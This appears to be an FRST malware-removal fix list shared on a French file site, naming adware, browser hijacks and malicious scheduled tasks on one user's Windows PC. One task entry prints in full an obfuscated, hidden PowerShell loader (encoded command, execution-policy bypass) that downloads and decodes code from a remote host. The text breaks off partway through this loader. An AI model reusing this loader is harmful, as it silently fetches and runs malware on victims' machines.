cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

start
CloseProcesses:
CreateRestorePoint:
(KeyStream) C:\ProgramData\KeyStream\KeyStream.exe
() C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
() C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
() C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
C:\ProgramData\KeyStream\KeyStream.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-18\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
AppInit_DLLs: C:\ProgramData\KeyStream\DIWYSV64.dll => C:\ProgramData\KeyStream\DIWYSV64.dll [1096704 2016-01-06] (KeyStream)
AppInit_DLLs-x32: C:\ProgramData\KeyStream\DIWYSV32.dll => C:\ProgramData\KeyStream\DIWYSV32.dll [855552 2016-01-06] (KeyStream)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3782850899-4072569730-3814174056-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_mdaffmarmarie_16_03¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFyEtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0AtA0A0AtA0A0BtGyE0CtDtBtG0DyCtAzztGyCyEtD0DtGtD0E0FtCtAyBzzyCtCtB0B0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D870249007%26a%3Dwny_mdaffmarmarie_16_03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_mdaffmarmarie_16_03¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFyEtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0AtA0A0AtA0A0BtGyE0CtDtBtG0DyCtAzztGyCyEtD0DtGtD0E0FtCtAyBzzyCtCtB0B0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D870249007%26a%3Dwny_mdaffmarmarie_16_03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ir_16_02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEyByEtN1L2XzutAtFtCyBtFtBtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2SyEyBtC0C0AyDzzyEtGyBzy0C0FtG0B0EyD0BtGtC0F0AyBtG0DtC0E0EtBzy0F0AtCtA0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D1048808242%26a%3Dwncy_ir_16_02%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_mdaffmarmarie_16_03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFyEtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0AtA0A0AtA0A0BtGyE0CtDtBtG0DyCtAzztGyCyEtD0DtGtD0E0FtCtAyBzzyCtCtB0B0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D870249007%26a%3Dwny_mdaffmarmarie_16_03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL =
SearchScopes: HKU\S-1-5-21-3782850899-4072569730-3814174056-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ir_16_02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEyByEtN1L2XzutAtFtCyBtFtBtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2SyEyBtC0C0AyDzzyEtGyBzy0C0FtG0B0EyD0BtGtC0F0AyBtG0DtC0E0EtBzy0F0AtCtA0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D1048808242%26a%3Dwncy_ir_16_02%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3782850899-4072569730-3814174056-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ir_16_02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEyByEtN1L2XzutAtFtCyBtFtBtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2SyEyBtC0C0AyDzzyEtGyBzy0C0FtG0B0EyD0BtGtC0F0AyBtG0DtC0E0EtBzy0F0AtCtA0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D1048808242%26a%3Dwncy_ir_16_02%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3782850899-4072569730-3814174056-1000 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_mdaffmarmarie_16_03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFyEtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0AtA0A0AtA0A0BtGyE0CtDtBtG0DyCtAzztGyCyEtD0DtGtD0E0FtCtAyBzzyCtCtB0B0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D870249007%26a%3Dwny_mdaffmarmarie_16_03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3782850899-4072569730-3814174056-1000 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ir_16_02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEyByEtN1L2XzutAtFtCyBtFtBtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0EtDtC0DzyyByDtGyBtD0EzztGtD0AyC0AtGtByC0DtCtGtByCtDyBtDyD0E0Dzy0CtByD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D1583762996%26a%3Dwncy_ir_16_02%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
BHO-x32: Pas de nom -> {11111111-1111-1111-1111-110511161180} -> Pas de fichier
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - Pas de fichier
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - Pas de fichier
FF Plugin HKU\S-1-5-21-3782850899-4072569730-3814174056-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [Pas de fichier]
S3 NPF; system32\drivers\NPF.sys [X]
2016-01-22 22:08 - 2016-01-22 22:09 - 00000000 ____D C:\ProgramData\KeyStream
2016-01-22 00:37 - 2016-01-22 23:15 - 00000000 ____D C:\Users\brabant\AppData\Local\CleanBrowserApp
2016-01-22 00:37 - 2016-01-22 00:37 - 00002003 _____ C:\Users\brabant\Desktop\Clean Browser.lnk
2016-01-22 00:29 - 2016-01-23 09:29 - 00000000 ____D C:\Users\brabant\AppData\Roaming\CleanBrowser
2015-11-17 22:55 - 2015-11-17 22:55 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Snap.Do Engine (HKU\S-1-5-21-3782850899-4072569730-3814174056-1000\...\{81e3a207-38ac-4ac2-a3e0-004b95de0234}) (Version: 11.77.1.17697 - ReSoft Ltd.) <==== ATTENTION
Windows 7 Service Pack 1 Packages (HKU\S-1-5-21-3782850899-4072569730-3814174056-1000\...\Windows 7 Service Pack 1 Packages) (Version: - ) <==== ATTENTION
Task: {200752DD-647C-41D7-B240-D0DF2F5425C1} - System32\Tasks\AION NF Saturday => Firefox.exe hxxp://boost.games724.com/click/46ee8de2b00db54424612991a82654f9b8bfe10d8f4de7c775801389726b73c5?cp1=yEzzyD0BtAzytCyCtAyC0DyEyCzytCzy2RtBtDtCyCtDtCtBtBtBtBtCzztDyEtCyDtC <==== ATTENTION
Task: {2D1259E1-B25C-4F98-9140-5E7F3DE95FD6} - System32\Tasks\AION NF Sunday => Firefox.exe hxxp://boost.games724.com/click/46ee8de2b00db54424612991a82654f9b8bfe10d8f4de7c775801389726b73c5?cp1=yEzzyD0BtAzytCyCtAyC0DyEyCzytCzy2RtBtDtCyCtDtCtBtBtBtBtCzztDyEtCyDtC <==== ATTENTION
Task: {30F802CE-D6DF-4F38-9813-1973B8127ADF} - System32\Tasks\AION NS Sunday => Firefox.exe hxxp://boost.games724.com/click/46ee8de2b00db54424612991a82654f9b8bfe10d8f4de7c775801389726b73c5?cp1=yEzzyD0BtAzytCyCtAyC0DyEyCzytCzy2RtBtDtCyCtDtCtBtBtBtBtCzztDyEtCyDtC <==== ATTENTION
Task: {564ECD02-4182-4BFD-9CED-00190F45AED6} - System32\Tasks\{0E0F0F47-7879-0A05-0F11-047F7D051178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHQAYQBiAGwAZQB6AGkAcAAuAGkAbgBmAG8ALwB1AC8APwBhAD0AbwAwAEMAQQBSAFEAQwBQAC0AeQB1ADkATQBsAGYAbwBiAGgAUwBSAFYAOAA2AGQATAB4AE8AZQBPAEcASgBLADIALQBtADkAWgB3ADcAcwBmAHIATgBNAFQAbgAzAEYAMABQAEEAaQBKADcANABXAGwAbwBwADMATgBuAHYARQBDAEQAQgBEAEYARwAyAGoASQAtAGwAaQA3AFcAWQBDAGwAawBSAFMAYgBIAGYAbABVAGoAegBaAEUAegBlAEYATgBXADYAVwBxAC0AaABLAEoAMwBBAEUAWgBtAC0AbABLAEwAeABlAFYATABaAEkAVAA5AFEAUAB1AGYAZwBLAHkAUgBhAEYAYgBpAHEATgBWAFEAcQAxAHUATABVAFQARQA3AGIAYgBiAHUAZABpAGsANwBOAGgAVABGAEcAdABCADQASwBhADQAeQB5AEkANwAyAFYAWQBRAHAATABiADEAcwA5AF8AcQBiADAAMABOAFgAWAByAGUAMwB1AHgAMAB0ADQAXwBFAHkANgBWAFgANwBOAEEAeQBGAFUARQAzAG4AcABjAGYAeABKAGgATABWAFQAMAB3AEUAYwBkAEgAQwBHAGUAVwBKADAAWQAzAEsAbgBMAEgASgB1AEIATABvAG0AagA1ADQAeABTAFUAdQBBAHUAZABUAHUAdQBrADcAUgBrAGEAdwBXAFAAdwBmAHUANABxADQASgByAFUAaABPAFQAeAAyAG0ANQBZAE4AOABIAHEARgAtAEMARABWAE0AaABwAGQAQwB6AFYANwBNAGsAcQBrAFUAXwBBAEYAaQBMAGgAMABBAGIAUQBzAGoAdgBrAGcAMABOAFQAZgBPAE0AcQBFAEoAWQBSAHgARgB0AEYAUgBKAHoAZABCAHEAUQBtAHoAdgB6AGgAaABSAHgAagBFAHQAbQBXAG0AcgBzAGMAaQAwAHIAVgA5ADQAagA3AEoAYwBzADUAbAB2ADYAdQBQADgAQQB6AFgARgBSAFQAOQBjAEcAYgBSADMAUgAzAHEAMgBJAHYARgAzAEwAdQBQAEYAbgBnAHEARwBMAHgAcgAyAGsATwBGADgAMgBzAGIAZQBTADcAawBDADkAMgA1AFgARQBpAG4ANwBfAFUARgBKAGoAMgBYAEUAcAA5ADUAVABiAFYALQBFAEUAagBFAFgATgBLAHAAWABDAG4AZABMAGQAcgA3AFYAVgBPAGQAOAB4AEIATABnADEAYwBVADUAZgBCAEUAVABJAEsARQBKAHcAZwBuAFkARwBfAGcAdgBPAHkATwBDAEoAdgBjADkAZwB4AFoATwBiAFcAVwAyAGcAVgB3AHIASABjAGkAMgBaAHMANgAwAFAAZQA5AFIAbgAxAFUAMgAyAHAAaABUAFEAOQBVAHQAbwBwADUAVQBZAG8AbgA2AHMAWQBOAF8ARQBGAE8AawBZAHQATABkAGgAUwBRAEsAYQAwAGoAbQBPAFcAQwBLAGcAZwByADIAYQBCAGMAYQBTADMAcwB2AHEAYwBjAGwARQBCAEsATQB1AGcAZABKAGQAcwBwAHYAVQBfAEIARgBwAEUARABMAEcAagBOAHEANQA4AFUAZAB2AFkAXwBWAC0ARQBLAEgAbgBvAGYASgBjAGIASgBNAHIAUwB3AGkASgBpAE4AaABnAGgAWAB0ADMAVQBYAEsAYgAtADAAUQBOAFoAUAAxAHoAagA2ADEAMwBMADUAdwBnADYAMQBEAHoASwB5AGEAYQBqADQAaQBVAFcAagBxAEEAUgBWAHQAOQBYAHQAVwA3AGYAcABLAFcAawB2AHIAMABLAGoAYwBoAG8AYQB6AHAAZQBOAHUAbQBsAGoAcwA5AGcAZwBFAGsAVABBADkATAAxAGgAcgBrADQARwBBAFAAUQAwAEIAUwBlADUARQB1AFEARABjAEsAawA0AFcAbQBOAEoAYwBfAE8ASgBfAFoALQBKAHcAUgB2ADcARgB6AEMAbwBiAEYAbABYAGMAdAB5AEYAVgBwAC0AVgBhAHoATwBqAFMAcwA5AGIAQwBXAHoAeQBzAGsAWQBSAHAAdgAyAHEAbwBOAHgAVgBWAFEAaQBDAGUARgAzAHAASgB2AEgARQAyADMAeABhAG0ASQBFADcATwB5AG4ARABWAEsANQBUADEAQwBqAGoAVABHAHIAWQBuAGkAUgBGAGgAZwB2AHcARwBQADcATgB4AGEAcwBEAE0AUQBsAGoAYQAxAC0ASgB0AG4AVgBzADgAZABhAHUAagBNAHoATABhAHIANQBSAFcATQBYADgAZABWAHYAcQBaAHUANgB3AEUAdABqAHUASgB0ACYAYwA9AGwAZwA0ADUANgBsAGQAXwBlAFAANQBUAGoAbQB4AHYAVABVAFgASQBMAEcASABqADAANwBTAE4AVABCAFMAcQBlAHYAbgBzAHUAeQBXAHoAZgAzAHMAZgBKAEgAUgB0AHcAQgBfAE4AdQBQAEIAMABTAGMAMQBZAGkASwBJAHAAbwAzAE0ARABlAGQAYgBEAHoARgBUAGYATAB1AG8ASgBzAFUAcAByAFEAOQBTAEQAdQBuAFQASwBoAHgASABFAEgARgBTAGYAawBIAEwASQBfAFMAcwB3AEwATwBMAEIAaABOAC0ARABoAGIAeABfADMAYgBRAE0AcABxAEkAdABGAEgAQgBjAFIAaABQAGEAbQBZAFYAOQBqAGUAcQAzAEQAQQBtAEQAUgBBAE4AawBvAEkAdQBkAG0AUQBGAE0AMABZAHAAbABLAE0AUwBaAFIARQBIAHkAdAB2AGwAVABRAEMATABJAGoAagBEADIAZgAwADQASQB0AEMATwBXAFIAbABnAHoAUABpAHkAegBWAEsASABjAFgAbQBzAEQAUABrAFAATAB5AFcAZgB2AG8AVwBQADUAWQBQAGsATABHAEUAcQBOAHAARAB1AGoAbQBOAEUAeQBGAHUAZgBCAHcANABPAFMAbgBrADAAcgBXADkAMgBSAEIARABsAGQAVwBaAHMAYwBIAFgAbgA5AGsAWQBIAGoAZgBoADAAMgAwAFEATwB1AFoAaQBTAHQANgBkAGQAZABrAE0AcQBKADkAcwAxAHcAMQBrAFIASABSAEcASQBjAEMAbgBSAFEAQwBRAEsAMgBqAEYARAA1ADEAMwA0AHcALQBlAEwAdgA5AEIAZgBSAFQAYwB4AEkAZwByAEoAQwBuAGMAbABZAEYARQBtAEYAVgBfAG4AQwBjAHUAYwB5ADQAbgBUAGUALQBzAE0AUABKAGYAYQBiAEkANwBPAHQAcwBTAE4AQgBVAGoAWQA1AHgAdgB6AFMAOABZAFUASgB2ADcATwBtAGcAYgB2AE4AbAA1AG4AdwAxADQAcQBYAFMAUwAwAGYATgBUAGoAdwB6ADgAXwBwAEMAZABJADkAUABHAF8AOAB1AEYAYgA5AEwAcwBFAGQAMgA2AEgASABiAGwAVQBlAGEASwB0AG4ARgBHAEsAMgBmAEwAdAA0AE0AWQB2AGwAZgBuAG4AUQBYADYANQBkAHcATABuAGYAOQBGAEQAZQB0AFIAbgBvAFkALQBSADkAdwB6AFUANgBRAEUAaQBhAHgAMgBVAG0AZQBhAFYARwBqAHcAbQAwAGoAYQBKAE8AWQBCADkAQwBYAEcAaAB5AF8ANAB0AHYATgBNAHcAVQBwAG4AVABoAHkAeABUAHYAMwBJAGEASwBkAGgASgA4ADAANgBqAHcAbwBvADUAbABvAHIAdQBQADEANwA4AEwAbwBvAFoAUABVADIAWQBwAGMAMABaAEYALQA3AHMATwBGADAAUABMAFcAaQBqAEgAZABqAGUANQA4AFEAdgBfAF8AbQAxADEAYgBHAHcAQwBMAGwAWAByAEwATABEADkAbQBNAEgAWgBvAGYAVQAwADkATQBoAG4AUwBpADUAcwBMAGEANgA2AHYAbQBWAHAAbgBmAGoASQAtAF8AVAB4AHEASQBxADIAMABjAGQAMABiAHQAYgBVAE8AQwB1AEwAVQBoAFQAUQBqAE4AcgB1ADgARQBvAGIASgA5ADMATABJAFIAWABaAHgAVQBWAGMAegBaAFcAdgBTAGMATABUAEsASgB0ADMAWABIAE4ATwBmADAAZwBBAGwAYgBBAG8ATABIAGcAUwA3AE0ASgBSADUAQgBqAHIANgB1ADAASQBXADMAOQBKAGcAegB6AHUAeAB2AEIAawAxAGEAbwBhAEkAbABzADUAYQBjAFYAcgBvAFQAbABpAF8ASwBHAEoARABoAGQAZwA0AG8AbwBZAGcANwA2AHYATgBZAHAAdQBmAGoANgB1AGEAVgA4AFkAWgBrAG8AWgBHAEwAeABYAG0AWgBrAFYANAB5AEgAVgBwAGwAdwBMAE4AYQA1ADYAMgB0AFAAQwBwAFcAMwBIAGQANQBpAHYAMwBGADcASgB2AEIAZQAzAFAAdgA1AE8AMwBpAE8AUABRAHEAegB5ADgAZQBVAHkAYgBxAEEATAAzADUAOQBKADYANwA0AFIAdQA1ADAALQB3AFEATQA2AEsAXwBBAE0AOABSAFEAaABxAGEARQBEADMAawBKAHIAUAA2ADYAZwBQADYANwBrAGcAUQBmAC0AeQBtAFoAUQBLAEEAcwBjAEoAWgBNAHEAMgBtAGkAUwA4AGEAYgBvAFQAXwBfAHEAdgBqAEgAUABaAEcAQQBZADMAXwBfAEgAVwAyAFYAMgBUADcAdgB0AHYAOQBxAGoAYgAzAEcAbABhADEASAB5AGsAcQBWAEQAZABqAGUAYgBLAFQAQwBaAHYATwBHAGQAXwBOAG0AMwB5AHcAXwB2AGsAeAAmAHIAPQA4ADYAMwA5ADQAOQAyADcAMQA3ADIANQAwADUAOQAwADgAOQA3ACIAOwAkAHMAdABzAGsAPQAiAHsAMABFADAARgAwAEYANAA3AC0ANwA4ADcAOQAtADAAQQAwADUALQAwAEYAMQAxAC0AMAA0ADcARgA3AEQAMAA1ADEAMQA3ADgAfQAiADsAJABwAHIAaQBkAD0AIgBPAG4AZQBTAHkAcwB0AGUAbQBDAGEAcgBlACIAOwAkAGkAbgBpAGQAPQAiAE4AUABJAEkATgBPAFAAUgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoA